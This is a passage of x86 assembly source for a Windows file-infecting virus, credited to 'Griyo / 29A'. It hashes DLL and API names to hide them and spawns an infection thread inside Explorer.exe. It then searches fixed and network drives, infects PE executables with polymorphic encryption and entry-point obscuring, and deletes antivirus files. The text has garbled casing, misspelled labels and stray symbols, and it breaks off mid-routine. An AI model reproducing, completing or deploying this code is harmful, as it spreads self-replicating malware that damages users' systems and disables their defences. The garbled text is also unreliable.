GNTBA_L1: POPAD

JMP GNTBA_L0

K32_F: POPAD

XCHG ECX, EAX

INC EAX

GNTBA_L2: @seh_removeframe

RET

; ================================================== ===========================

VirloadLib

;

To use crc32 instead of api names sounds cool ... but there is still some

Strings Authors Cant Get Rid of ... WHEN CALLING LOADLIBRARY THE VIRUS MUST

Specify The DLL Name

;

THIS ROUTINE IS The Solution To Avoid The Usage Of DLL Names

;

On Entry:

EAX -> CRC32 of DLL Name

ESI -> CRC32 of API Names

; EDI -> Where to Put API Addresses

ECX -> Number of Apis to find

ON EXIT:

EAX -> Module Handle or Null On Error

; ================================================== =========================== VirloadLib: Push ECX

PUSH ESI

Push EDI

MOV DWORD PTR [EBP A_SDLL_CRC32], EAX

Lea Eax, DWORD PTR [EBP DIRECTFINDDATA]

Push eax; lpfindfiledata

LEA EAX, DWORD PTR [EBP SZSYSTEMDIR]; LPFileName

Push EAX

Call DWORD PTR [EBP A_FINDFIRSTFILEA]

CMP EAX, INVALID_HANDLE_VALUE

JZ Eviroadlib

MOV DWORD PTR [EBP H_FIND], EAX

Checkdllname: Lea ESI, DWORD PTR [EBP DIRECTFINDDATA WFD_SZFILENAME]

Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Call parse_filename

MOV ESI, EDX

Call get_str_crc32

CMP EDX, DWORD PTR [EBP A_SDLL_CRC32]

JE OkCheckdll

Lea Eax, DWORD PTR [EBP DIRECTFINDDATA]

Push eax; lpfindfiledata

Push DWORD PTR [EBP H_FIND]; HFINDFILE

Call DWORD PTR [EBP A_FINDNEXTFILEA]

OR EAX, EAX

Jnz Checkdllname

Eviroadlib: POP EDI

POP ESI

POP ECX

XOR EAX, EAX

RET

Okcheckdll: Lea ESI, DWORD PTR [EBP SZSYSTEMDIR]

Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Push EDI

Call parse_filename

LEA ESI, DWORD PTR [EBP DIRECTFINDDATA WFD_SZFILENAME]

MOV EDI, EDX

Call parse_filename

Call DWORD PTR [EBP A_LOADLIBRARYA]

OR EAX, EAX

JZ Eviroadlib

MOV EBX, EAX

POP EDI

POP ESI

POP ECX

Call get_apis

Jecxz okvirloadlib

Push EBX

Call DWORD PTR [EBP A_FREELIBRARY]

XOR EAX, EAX

RET

OkvirloadLib: Mov Eax, EBX

RET

; ================================================== ============================ t Routine Takes a string pointed by ESI and COPIES

IT INTO A Buffer Pointed by EDI

;

The result string will be converted to Upper-case

;

On Entry:

ESI -> Pointer to Source String

EDI -> Pointer To Returned String

;

ON EXIT:

; al-> null

; edx -> Points to Character Next To Last /

EDI -> Points 1byte Above the Null Terminator

; ================================================== ===========================

PARSE_FILENAME: MOV EDX, EDI

CLD

Scanzstring: LODSB

CMP Al, "A"

JB NO_UPPER

CMP AL, "Z"

JA NO_UPPER

And Al, 0DFH

NO_UPPER: Stosb

CMP AL, "/"

JNE ERR_SLASH_POS

Mov Edx, EDI

Err_slash_pos: OR Al, Al

JNZ Scanzstring

RET

; ================================================== ===========================; Copyright NOTICE AND DISCLAIMER

; ================================================== ===========================

Copyright DB '[Dengue Hemorrhagic Fever "

DB 'Biocoded by Griyo / 29A]'

DiscLaimer DB 'Disclaimer: this Software Has Been Designed'

DB 'for research purposes only. The author is'

DB 'NOT RESPONSIBLE for ANY Problems Caused Due To'

DB 'Improper or IlleGal Usage Of IT'

; ================================================== ===========================

Virus Initialization (Inside Explorer.exe)

; ================================================== =================================== Explorerinit: Call Explorerdelta

Explorerdelta: POP EBP

Sub EBP, Offset Explorerdelta

; ================================================== ===========

Get Current Local Time

; ================================================== ===========

Freeexplorerok: Lea ESI, DWORD PTR [EBP local_time]

PUSH ESI

Call DWORD PTR [EBP A_GETLOCALTIME]

; ================================================== ===========

Initialize Random Number Generator SEED USING CURRENT

Year and current Month

; ================================================== =========== CLD

Lodsw

ROL Eax, 10h

Lodsw

MOV DWORD PTR [EBP RND32_SEED], EAX

; ================================================== ===========

Locate Kernel32 Code Section in Memory ... this information

Will BE Used Later in The EPO Routines

; ================================================== ===========

MOV EBX, DWORD PTR [EBP HKERNEL32]

Call get_code_sh

MOV EAX, DWORD PTR [EDI SH_VIRTUALADDRESS]

Add Eax, EBX

MOV DWORD PTR [EBP K32CODESTART], EAX

Add Eax, DWORD PTR [EDI SH_VIRTUALSIZE]

MOV DWORD PTR [EBP K32CODEEND], EAX

; ================================================== ===========

; Sleep for a moment, Before Start Making Noise

; ================================================== =========== push 00005000H

Call DWORD PTR [EBP A_SLEP]

; ================================================== ===========

(Load Imagehlp.dll

;

; The imagehlp functions area supported by the microsoft

Windows NT, Windows 95, And Windows 98 Operating Systems ...

; They is used Mostly by Programming Tools, Application Setup

Utilities, And Other Programs That Need Access to the Data

Contained in a pe image

; ================================================== ===========

MOV EAX, DWORD PTR [EBP CRCSZIMGHLP]

MOV ECX, NumImghlPapis

Lea ESI, DWORD PTR [EBP CRC32IMGHLPAPIPAPIS]

Lea EDI, DWORD PTR [EBP Epimghlpapapis]

Call virloadlib

MOV DWORD PTR [EBP HIMGHLP], EAX

; ================================================== ===========; load sfc.dll (windows 2000 only)

; ================================================== ===========

MOV DWORD PTR [EBP HSFC], 00000000H

CMP DWORD PTR [EBP DWMAJORVERSION], 00000005H

JB Ready2infect

MOV EAX, DWORD PTR [EBP CRCSZSFC]

MOV ECX, NUMSFCAPIS

LEA ESI, DWORD PTR [EBP CRC32SFCAPIS]

Lea EDI, DWORD PTR [EBP EPSFCAPIS]

Call virloadlib

MOV DWORD PTR [EBP HSFC], EAX

; ================================================== ===========

Initialization Inside Explorer.exe Complete ...

;

Now create a thread to search for files to infect and

Get Control Back to Explorer.exe

; ================================================== ===========

Ready2infect: Lea Eax, DWORD PTR [EBP IF_THREADID]

Push Eax; LPTHREADIDXOR EDX, EDX

Push EDX; DWCREATIONFLAGS

Push EDX; LPParameter

Lea Eax, DWORD PTR [EBP Infectionthread]

Push Eax; LPStartAddress

Push Edx; DWSTACKSIZE

Push Edx; LPTHREADATTRIBUTES

Call DWORD PTR [EBP A_CREATTHREAD]

OR EAX, EAX

JZ AfTERTHREAD

Ret; Let the Thread Running Until Terminates

; ================================================== ===========

Free SFC

; ================================================== ===========

AfTerthread: MOV Eax, DWORD PTR [EBP HSFC]

OR EAX, EAX

JZ SfcNotloaded

Push EAX

Call DWORD PTR [EBP A_FREELIBRARY]

; ================================================== ===========

Free imagehlp

; ================================================== ===========

SFCNOTLOADED: MOV EAX, DWORD PTR [EBP HIMGHLP]

OR EAX, EAX

JZ EXITITHREAD

Push EAX

Call DWORD PTR [EBP A_FREELIBRARY]

RET

; ================================================== ===========================

; Virus Infection Thread, Created from INSIDE Explorer.exe Process

; ================================================== ===========================

Infectionthread: Call ThreadDelta

ThreadDelta: POP EBP

Sub ebp, offset threaddelta

LEA ESI, DWORD PTR [EBP SZLOGICALDRIVES]]

Mov Edi, Sizeof_LDSB

PUSH ESI

Push EDI

Call DWORD PTR [EBP A_GETLOGICALDRIVESTRINGSA]

OR EAX, EAX

JZ EXITITHREAD

CMP EAX, EDI

Ja exitithread

; ================================================== ===========

FOLLOW The Drives Chain

; ================================================== =========== DriveSloop: CMP Byte Ptr [ESI], 00H

JNZ Moredrives

; ================================================== ===========

; Terminate Infection Thread

; ================================================== ===========

ExitithRead: CallAftethread

Push 00000000H

Call dword PTR [EBP A_EXITTHREAD]; Leave the Thread

; ================================================== ===========

Check Drive Type, ONLY Fixed or Remote Drives Allowed

; ================================================== ===========Moredrives: Push ESI

Call DWORD PTR [EBP A_GETDRIVETYPEA]

CMP EAX, 00000003H; Drive_Fixed

Je CheckthisDrive

CMP Eax, 00000004; Drive_Remote

JNE NEXTDRIVE

; ================================================== ===========

Got it! Do Recursive Search on Drive

; ================================================== ===========

CheckThisdrive: Push ESI

Lea EDI, DWORD PTR [EBP BUFGETDIR]

Push EDI

Call parse_filename

Call search4files

POP EDI

POP ESI

NextDrive: CLD

NextDSTRING: LODSB

OR Al, Al

Jnz nextdstring

JMP Drivesloop

; ================================================== ===========================

Search for Target ...

;

; Tris routine its able to call itself in Order to Perform A Recursive; Search All Along The Entire Directory Tree

;

; ================================================== ===========================

; ================================================== ===========

Store Local Information on The Stack

; ================================================== ===========

Search4Files: SUB ESP, SIZEOF_WIN32_FIND_DATA 00000004H

MOV EBX, ESP

Find frame:

;

Path WHERE TO Perform Search (Size Max_Path)

Return Address (Size DWORD)

FindHandle (Size DWORD)

Find Data (size sizeof_win32_find_data)

Findstack_ptr2finddata EQU 00000000H

Findstack_ptr2findhandle EQU SIZEOF_WIN32_FIND_DATA

Findstack_ptr2returnaddress EQU SIZEOF_WIN32_FIND_DATA 00000004H

Findstack_ptr2searchPath EQU SIZEOF_WIN32_FIND_DATA 00000008H

; ================================================== ===========; Do FindfirstFile

; ================================================== ===========

Push ebx; lpfindfiledata

MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]

Mov EDI, ESI

Push EDI; LPFileName

Call parse_filename

Dec Edi

CMP Byte PTR [EDI-00000001H], '/'

JNE Rootaware

Dec Edi

Rootaware: MOV EAX, '*. * /'

Stosd

XOR EAX, EAX

Stosb

Call DWORD PTR [EBP A_FINDFIRSTFILEA]

CMP EAX, INVALID_HANDLE_VALUE

JE ErrorFindFirst

MOV DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE], EAX

; ================================================== ===========

Find Data Ready to Be Checked

; ================================================== ===========

GOFINDRECORD: Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]

CLD

Lodsd

; ================================================== ===========

Check for...

; ================================================== ===========

CMP AX, 002EH

JE DOFINDNEXT

And Eax, 00ffffh

CMP EAX, 00002E2EH

JE DOFINDNEXT

; ================================================== ===========

CHECK IF this is A Directory

; ================================================== ===========

MOV EAX, DWORD PTR [EBX]

Test Eax, File_Attribute_directory

JZ DofileFound

; ================================================== ===========

Directory Found, Perform Recursive Search on it; ======================================== ====================

Push EBX

MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]

SUB ESP, MAX_PATH

MOV EDI, ESP

Push EDI

Call parse_filename

Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]

MOV EDI, EDX

Call parse_filename

Call search4files

POP EDI

Add ESP, MAX_PATH

POP EBX

JMP DOFINDNEXT

; ================================================== ===========

File Found, Check if its a valid host

; ================================================== ===========

DOFILEFOUND: AND Eax, file_attribute_directory or /

FILE_ATTRIBUTE_COMPRESSED OR /

FILE_ATTRIBUTE_SYSTEM

JNZ DOFINDNEXT

; ================================================== ===========

Save file time

; ================================================== =========== CLD

Lea ESI, DWORD PTR [EBX WFD_FTCRETIONTIME]

Lea EDI, DWORD PTR [EBP FT_CRETIONTIME]

Movsd; ftcreationTIME (DWLOWDATETIME)

Movsd; ftcreationTIME (DWHighDateTime)

Movsd; ftlastaccesstime (dwilldatetime)

Movsd; ftlastaccesstime (dwhighdatetime)

Movsd; ftlastwritetime (dwilldatetime)

Movsd; ftlastwritetime (dwhighdatetime)

; ================================================== ===========

Check if File Size is allowed

; ================================================== ===========

Lodsd; EDI POINTS to WFD_NFILESIGHIGH

OR EAX, EAX

JNZ DOFINDNEXT

Lodsd

CMP EAX, 0FFFFFFFFH- /

(SIZE_VIRTUAL (Number_Of_Poly_Layers * 00004000H)))

Jae DOFINDNEXT

CMP Eax, Inf_SIZE

JBE DOFINDNEXT

; ================================================== ===========; Save the File Size for L8R USE

; ================================================== ===========

MOV DWORD PTR [EBP FileSizeondisk], EAX

; ================================================== ===========

Check if file is already infected, using size padding

; ================================================== ===========

Size_padding Equ 00000065H

MOV ECX, SIZE_PADDING

XOR EDX, EDX

Div ECX

OR EDX, EDX

JZ DOFINDNEXT

; ================================================== ===========

Get Complete Path FileName and Convert it to Upper Case; ====================================== =====================================================================================================================================================

MOV ESI, DWORD PTR [EBX FINDSTACK_PTR2SearchPath]

Lea EDI, DWORD PTR [EBP BUFSTRFILENAME]

Call parse_filename

Lea ESI, DWORD PTR [EBX WFD_SZFILENAME]

MOV EDI, EDX

Call parse_filename

; al-> null

; EDX -> Points to FileName At the end of path

EDI -> Points 1byte Above the Null Terminator

; ================================================== ===========

Check File Extension

; ================================================== ===========

LEA ESI, DWORD PTR [EDI-00000005H]

Call get_str_crc32

Lea ESI, DWORD PTR [EBP TBLCRC32SZEXT]

MOV ECX, Numberofext

CheckextLoop: Lodsd

Sub Eax, EDX

JNZ NOINTERESTED

; ================================================== ===========; Extension match ... infect file

; ================================================== ===========

Call fileInfection

JMP Short DofindNext

Nointerested: loop checkextloP

; ================================================== ===========

None of infectable extensions match

Leets See if this file is an AV Related File ...

; ================================================== ===========

Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]

Mov EDI, ESI

Call Parse_FileName; Parse and Reparse

MOV ESI, EDX

Call get_str_crc32

LEA ESI, DWORD PTR [EBP TBLCRC32AV]

MOV ECX, Numberofav

Checkavloop: Lodsd

Sub Eax, EDX

Jnz avnomatch

; ================================================== ===========; av file found ... reset ITS Attributes and delete it

; ================================================== ===========

Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]

Push Eax; 00000000H

PUSH ESI

Call DWORD PTR [EBP A_SETFILEATTRIBUTESA]

PUSH ESI

Call DWORD PTR [EBP A_DELETEFILEA]

JMP Short DofindNext

Avnomatch: loop checkavloop

; ================================================== ===========

; Before looking for more files letts sleep a while

; ================================================== ===========

DOFINDNEXT: MOV EAX, 00000800H

Call get_rnd_range

Add eax, 00000400H

Push EAX

Call DWORD PTR [EBP A_SLEP]

; ================================================== ===========; Find Next Directory or File

; ================================================== ===========

Push ebx; lpfindfiledata

Push DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE]

Call DWORD PTR [EBP A_FINDNEXTFILEA]

OR EAX, EAX

JNZ Gof Indrecord

ErrorFindFirst: Mov Eax, 00002000H

Call get_rnd_range

Add Eax, 00001000H

Push EAX

Call DWORD PTR [EBP A_SLEP]

Push DWORD PTR [EBX FINDSTACK_PTR2FINDHANDLE]

Call DWORD PTR [EBP A_FINDCLOSE]

MOV ESP, EBX

Add ESP, SIZEOF_WIN32_FIND_DATA 00000004H

RET

; ================================================== ===========================

; Infect PE Files

;

On Entry:

BUFSTRFILENAME -> Buffer That Contains Complete Path and

FILENAME

DirectFinddata -> Win32 Find Data Structure Filled with

Information About the file to infect

; ================================================== =========================== fileinfection: Push EBX

Lea ESI, DWORD PTR [EBP BUFSTRFILENAME]

Mov EDI, ESI

Call parse_filename

MOV ESI, EDX

*********************************************************** ***********************************

; MOV EAX, DWORD PTR [ESI]

; CMP EAX, 'TAOG'

JNE EXITFILEINF

*********************************************************** ***********************************

; ================================================== ===========

Avoid Some Files from Being Infected

; ================================================== ===========

Checkfilename: Push ESI

MOV ECX, 00000002H

Call get_crc32

LEA ESI, DWORD PTR [EBP AVOID_TBL]

MOV ECX, Avoid_Num

AvoidLoop: Lodsd

CMP EAX, EDX

JNE NEXTAVOID

POP ESI

JMP EXITFILEINF

NEXTAVOID: LOOP AVOIDLOOP

POP ESI

Lodsb

CMP Al, '.'

JNE CheckfileName

; ================================================== ===========; Check if file is protected by Windows File Protection

(Windows 2000 ONLY)

; ================================================== ===========

CMP DWORD PTR [EBP HSFC], 00000000H

JZ Notprotected

Lea Eax, DWORD PTR [EBP BUFSTRFILENAME]

Push EAX

Push 00000000H

Call dword PTR [EBP A_SFCISFILEPROTECTED]

OR EAX, EAX

JNZ EXITFILEINF

; ================================================== ===========

; Try to Infect this file

; ================================================== ===========

Notprotaced: Call Tryattach

; ================================================== ===========; EXIT FILE Infection

; ================================================== ===========

EXITFILEINF: POP EBX

RET

; ================================================== ===========================

Infect File Routines

;

On Entry:

BUFSTRFILENAME -> Buffer Filled with Path FileName

; ================================================== ===========================

SEH_BLOCK_0001 Macro

Add ESP, -CPUSHAD

JNZ APE_ERR

ENDM

; ================================================== ===========; Open Target File for Read-Only Access

; ================================================== ===========

Tryattach: Call Filemapro

OR EAX, EAX

JZ INF_FILE_ERR

; ================================================== ===========

Register EBX Contains The Base Address of The Target File

ALL Along Infection Routines

; ================================================== ===========

MOV EBX, EAX

; ================================================== ===========

Check for MZ Signature At Base Address; =========================================== ===================

CLD

CMP Word PTR [EBX], Image_DOS_SIGNATURE

JNE INF_CLOSE_FILE

; ================================================== ===========

Check File Address of Relocation Table

; ================================================== ===========

CMP Word PTR [EBX MZ_LFARLC], 0040H

JB INF_CLOSE_FILE

; ================================================== ===========

Now Go to the Pe Header and Check for the PE SIGNATURE

; ================================================== =========== Mov ESI, DWORD PTR [EBX MZ_LFANEW]

MOV EAX, DWORD PTR [EBP FileSizeOnDisk]

SHR EAX, 01H

CMP ESI, EAX

JAE INF_CLOSE_FILE

Add ESI, EBX

Lodsd

CMP EAX, Image_NT_SIGNATURE

JNE INF_CLOSE_FILE

; ================================================== ===========

Check Machine Field In Image_File_Header

; Just Allow i386 PE Files

; ================================================== ===========

CMP Word PTR [ESI FH_MACHINE], Image_FILE_MACHINE_I386

JNE INF_CLOSE_FILE

; ================================================== ===========

Now Check The Characteristics, Look IF File

IS an executable

; ================================================== =========== Mov AX, Word PTR [ESI FH_CHARACTERISTICS]

Test AX, Image_File_executable_image or /

Image_file_32bit_machine

JZ INF_CLOSE_FILE

; ================================================== ===========

Avoid DLL'S

; ================================================== ===========

Removed to allow .cpl infection

;

Test AX, Image_File_DLL

JNZ INF_CLOSE_FILE

; ================================================== ===========

; Virus Resides on Last Section

; ================================================== =========== Call GET_LAST_SH

JECXZ INF_CLOSE_FILE

; ================================================== ===========

Check Subsystem, ONLY GUI Applications Allowed

; ================================================== ===========

Movzx Eax, Word PTR [ESI OH_SUBSYSTEM]

CMP EAX, Image_Subsystem_Windows_gui

JNE INF_CLOSE_FILE

; ================================================== ===========

; Save RVA of Last Section

; ================================================== ===========

Mov Eax, EDI

Sub Eax, EBXMOV DWORD PTR [EBP VIRUS_SH], EAX

; ================================================== ===========

This is an attempt to avoid offending pe file formats

; ================================================== ===========

Mov Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_SIZEOFRAWDATA]

Add Eax, DWORD PTR [ESI OH_FILALIGNMENT]

CMP EAX, DWORD PTR [EBP FileSizeOnDisk]

JB INF_CLOSE_FILE

; ================================================== ===========

Save a Pointer to Imports

; ================================================== ===========

MOV EAX, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_IMPORT /

DD_VIRTUALADDRESS]

MOV DWORD PTR [EBP FileImport], EAX

; ================================================== ===========; Go to Relocations

; ================================================== ===========

MOV EAX, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_BASERELOC /

DD_VIRTUALADDRESS]

OR EAX, EAX

JZ Cant_OverWrite

; ================================================== ===========

; RELOCATIONS Section Is The Last Section?

; ================================================== ===========

SUB EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

JZ GOT_VIR_OFFSET

; ================================================== ===========; We Cant Overwrite Relocations ...

; ... lets attach the virus to the end of last section

; ================================================== ===========

Cant_overwrite: Mov Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

MOV EDX, DWORD PTR [EDI Sh_VIRTUALSIZE]

CMP EAX, EDX

JAE GOT_VIR_OFFSET

MOV EAX, EDX

GOT_VIR_OFFSET: Add Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

MOV DWORD PTR [EBP VIR_OFFSET], EAX

; ================================================== ===========

; Search Inside Host Code ...

; ================================================== ===========

@Seh_setupframe

XOR ECX, ECX

Pushhad

Call doepo

MOV DWORD PTR [ESP PUSHAD_ECX], ECX

APE_ERR: POPAD

@Seh_removeframe

JECXZ INF_CLOSE_FILEMOV DWORD PTR [EBP INJECT_OFFS], ECX

; ================================================== ===========

Close File ...

; ================================================== ===========

Call fileunmapro

; ================================================== ===========

; ... and remap with iversize

; ================================================== ===========

Call filemaprw

OR EAX, EAX

JZ INF_FILE_ERR

Add DWORD PTR [EBP VIRUS_SH], EAX

MOV EBX, EAX

; ================================================== ===========

Move virus to file; ============================================= ================

Lea ESI, DWORD PTR [EBP VIRO_SYS]

MOV EDI, DWORD PTR [EBP VIR_OFFSET]

Add Edi, EBX

Push EDI

MOV ECX, INF_SIZE

CLD

REP MOVSB

; ================================================== ===========

Save Original Code

; ================================================== ===========

MOV ESI, DWORD PTR [EBP INJECT_OFFS]

Add ESI, EBX

POP EDI

Push EDI

Add Edi, ORG_CODE-VIRO_SYS

CLD

Movsb

Movsd

; ================================================== ===========

; Save Some Registers on 1st Decryptor

; ================================================== =========== Mov ECX, 00000004H

Push ECX

Lea EDI, DWORD PTR [EBP TBLSTDPSHP]

CLD

Cleanstdloop: Mov Eax, 00000004H

Sub Eax, ECX

Stosd

Loop cleanstdloop

POP ECX

Push ECX

Lea EDI, DWORD PTR [EBP PSHPSTEPINDEX]

Gentblstdloop: MOV EAX, 00000004H

Call get_rnd_range

LEA ESI, DWORD PTR [EBP TBLSTDPSHP EAX * 04H]

Lodsd

CMP EAX, 0FFFFFFFH

JZ geentblstdloop

Stosd

MOV DWORD PTR [ESI-00000004H], 0FFFFFFFH

Loop gentsblstdloop

POP ECX

Lea ESI, DWORD PTR [EBP PSHPSTEPINDEX]

POP EDI

Push EDI

Add Edi, TBLDOPOLYPOPS-VIRO_SYS

DOPOLYPOPSLOOP: LODSD

Lea EDX, DWORD PTR [EBP EAX TBLDOPOP]

Mov Al, Byte Ptr [EDX]

Stosb

Loop dopolypopsloop

; ================================================== ===========

Prepare First Decryptor Mark

; ================================================== ===========

MOV BYTE PTR [EBP ISFIRST], CL

; ================================================== ===========; Initialize Size Of All Decryptors

; ================================================== ===========

MOV DWORD PTR [EBP DECRYPTOR_SIZE], ECX

; ================================================== ===========

; Get CRC32 of Main Virus Body and Save IT for L8R USE

; ================================================== ===========

POP ESI

PUSH ESI

Add ESI, CRC_PROTECTED-VIRO_SYS

Mov ECX, SizeoftProtect

Call get_crc32

POP EDI

MOV DWORD PTR [EDI ViRalChecksum-Viro_sys], EDX

; ================================================== ===========; Generate Polymorphic Encryption

; ================================================== ===========

Add Edi, INF_SIZE

MOV EDX, DWORD PTR [EBP VIR_OFFSET]

Mov Eax, Number_Of_Poly_Layers

Call get_rnd_range

INC EAX

INC EAX

MOV ECX, EAX

Each_Layer: Push ECX

CMP ECX, 00000001H

JNE set1stflag

MOV DWORD PTR [EBP ISFIRST], 0FFH

Set1stflag: MOV ECX, DWORD PTR [EBP DECRYPTOR_SIZE]

Add ECX, INF_SIZE

MOV ESI, DWORD PTR [EBP VIR_OFFSET]

Call Mutate

Add DWORD PTR [EBP DECRYPTOR_SIZE], ECX

POP ECX

LOOP Each_Layer

; ================================================== ===========

; Insert a call to Virus Code over the API CALL

; ================================================== ===========

MOV EDI, DWORD PTR [EBP INJECT_OFFS] Add Edi, EBX

Mov al, 0e8h

Stosb

Push EDI

; ================================================== ===========

Calculate The Call Displacement

; ================================================== ===========

Call get_code_sh

MOV EAX, DWORD PTR [ESI OH_FILALIGNMENT]

MOV DWORD PTR [EBP RAW_ALIGN], EAX

MOV EAX, DWORD PTR [EBP INJECT_OFFS]

Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]

Push EAX

MOV EAX, DWORD PTR [EBP Entry_Point]

Sub eax, 00000005H

Sub Eax, EBX

MOV EDI, DWORD PTR [EBP VIRUS_SH]

Sub Eax, DWORD PTR [EDI SH_POINTERTORAWDATA]

Add Eax, DWORD PTR [EDI SH_VIRTUALADDRESS]

POP EDX

Sub Eax, EDX

POP EDI

Stosd

MOV EDI, DWORD PTR [EBP VIRUS_SH]

; ================================================== ===========

; Set Read / Write Access on Virus Section

; ================================================== =========== OR DWORD PTR [EDI Sh_Characteristics], /

Image_scn_mem_read or image_scn_mem_write

; ================================================== ===========

DONT Share Virus Section

; ================================================== ===========

And DWORD PTR [EDI SH_CHARACTERISTICS], /

Not image_scn_mem_shared

; ================================================== ===========

Update SizeOfrawData

; ================================================== ===========

MOV EAX, DWORD PTR [EBP VIR_OFFSET] Add Eax, DWORD PTR [EBP DECRYPTOR_SIZE]

Add Eax, Inf_Size

MOV EDX, DWORD PTR [EDI Sh_POINTERTORAWDATA]

MOV DWORD PTR [EBP FIX_SIZE], EDX

Sub Eax, EDX

CMP EAX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Jbe rawsizeok

; ================================================== ===========

; If we change SizeofrawData Round Up to nearest

File Alignment

; ================================================== ===========

XOR EDX, EDX

MOV ECX, DWORD PTR [EBP RAW_ALIGN]

Div ECX

INC EAX

Mul ECX

MOV EDX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Mov DWORD PTR [EDI SH_SIZEOFRAWDATA], EAX

Sub Eax, EDX

Test DWORD PTR [EDI SH_CHARACTERISTICS], /

Image_scn_cnt_initialized_data

JZ Rawsizeok

Add DWORD PTR [ESI OH_SIZEOFINIALIZEDDATA], EAX

; ================================================== ===========

Update Virtualsize

; ================================================== =========== Rawsizeok: MOV Eax, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

Add DWORD PTR [EBP FIX_SIZE], EAX

Add eax, size_virtual-inf_size

CMP EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

Jbe Virtualsizeok

MOV DWORD PTR [EDI SH_VIRTUALSIZE], EAX

; ================================================== ===========

Update SizeOfImage

; ================================================== ===========

Virtualsizeok: MOV Eax, DWORD PTR [EDI Sh_VIRTUALADDRESS]

Add Eax, DWORD PTR [EDI SH_VIRTUALSIZE]

XOR EDX, EDX

MOV ECX, DWORD PTR [ESI OH_SECTIONALNMENT]

Div ECX

INC EAX

Mul ECX

MOV DWORD PTR [ESI OH_SIZEOFIMAGE], EAX

; ================================================== ===========

FIND ANY DATA DIRECTORY Entry Pointing to Last Section; ======================================= =====================

MOV ECX, image_numberof_directory_entries

Lea EDX, DWORD PTR [ESI OH_DATADIRECTORY]

FDATAPTR2LAST: MOV EAX, DWORD PTR [EDX]

CMP EAX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

JNE NextFDataPtr

MOV EAX, DWORD PTR [EDI SH_VIRTUALSIZE]

Mov DWORD PTR [EDX 00000004H], EAX

JMP Short DonefdataPtr

NextfdataPtr: add edx, 00000008H

Loop fdataptr2last

; ================================================== ===========

Clear Base Relocation Field

; ================================================== ===========

DONEFDATAPTR: XOR EAX, EAX

Lea EDI, DWORD PTR [ESI /

OH_DATADIRECTORY /

DE_BASERELOC /

DD_VIRTUALADDRESS]

CLD

Stosd

Stosd

; ================================================== ============ COMPUTE New File Checksum and Update It On Pe Header

; ================================================== ===========

MOV EAX, DWORD PTR [EBP FIX_SIZE]

MOV ECX, SIZE_PADDING

XOR EDX, EDX

Div ECX

INC EAX

Mul ECX

Push EAX

CMP DWORD PTR [EBP HIMGHLP], 00000000H

JZ Nochecksum

MOV BYTE PTR [EBX EAX], 00H

Mov Edx, EAX

Lea ESI, DWORD PTR [EBP CHECKSUMPE]

Push ESI; Checksum

Lodsd

Push ESI; Headersum

Push EDX; FileLength

Push EBX

Call DWORD PTR [EBP A_CHECKSUMMAPPEDFILE]

OR EAX, EAX

JZ Nochecksum

CMP DWORD PTR [ESI], 00000000H

JZ Nochecksum

MOV EDX, DWORD PTR [ESI-00000004h]

Mov DWORD PTR [EAX /

NT_OPTIONALHEADER.OH_CHECKSUM], EDX

; ================================================== ===========

Mark File As Infected and Optimize File Size

; ================================================== =========== Nochecksum: POP EAX

Mov DWORD PTR [EBP FATSIZE], EAX

Call fileunmaprw

RET

; ================================================== ===========

Close File Mapping

; ================================================== ===========

INF_CLOSE_FILE: CALL Fileunmapro

INF_FILE_ERR: RET

; ================================================== ===========================

Scan Host Code

;

On Entry:

EBX -> Memory Image Base Address

EXIT:

ECX -> Inject Point Offset in File

OR NULL IF ERROR

; ================================================== =================================================================================================================================================================================== #

Call Rva2Raw

MOV DWORD PTR [EBP Importsh], EDI

Call get_code_sh

JECXZ EXITAPE

MOV EAX, DWORD PTR [ESI OH_IMAGEBASE]

MOV DWORD PTR [EBP HOST_BASE], EAX

Sub EDX, DWORD PTR [EDI SH_VIRTUALADDRESS]

MOV ECX, DWORD PTR [EDI Sh_SIZEOFRAWDATA]

SUB ECX, EDX

Add Edx, DWORD PTR [EDI SH_POINTERTORAWDATA]; Entry-Point Raw

Lea ESI, DWORD PTR [EBX EDX]

Search_call: Push ECX

XOR EAX, EAX

Lodsb

CMP Al, 0E8H; API CALL GENERATED BY BORLAND Linker?

JE TRY_BORLAND

CMP AL, 0FFH; API CALL GENERATED BY Microsoft Linker?

JE TRY_MICROSOFT

ERR_API_CALL: POP ECX

Loop search_call

EXITAPE: RET

Try_borland: MOV Eax, ESI

Add Eax, DWORD PTR [ESI]; Go to Refered Address

Sub Eax, EBX; Convert to RVA

MOV EDX, DWORD PTR [EDI Sh_VIRTUALADDRESS]

CMP EAX, EDX

JB ERR_API_CALL; BELOW CODE?

Add Edx, DWORD PTR [EDI SH_VIRTUALSIZE]

CMP EAX, EDX

JAE ERR_API_CALL; Above Code?

CMP Word PTR [EAX EBX-00000002H], 25ffH; JMP DWORD PTR [xxxx]

JNE ERR_API_CALL

Push DWORD PTR [EAX EBX]

POP EAX

SUB EAX, DWORD PTR [EBP HOST_BASE]; Get A RVA Again

MOV EDX, DWORD PTR [EBP Importsh]

MOV ECX, DWORD PTR [EDX Sh_VIRTUALADDRESS]

CMP EAX, ECX

JB ERR_API_CALL; BELOW IMPORTS?

Add Ecx, DWORD PTR [EDX SH_VIRTUALSIZE]

CMP EAX, ECX

JAE ERR_API_CALL; Above Imports?

Sub Eax, DWORD PTR [EDX SH_VIRTUALADDRESS] Add Eax, DWORD PTR [EDX SH_POINTERTORAWDATA]

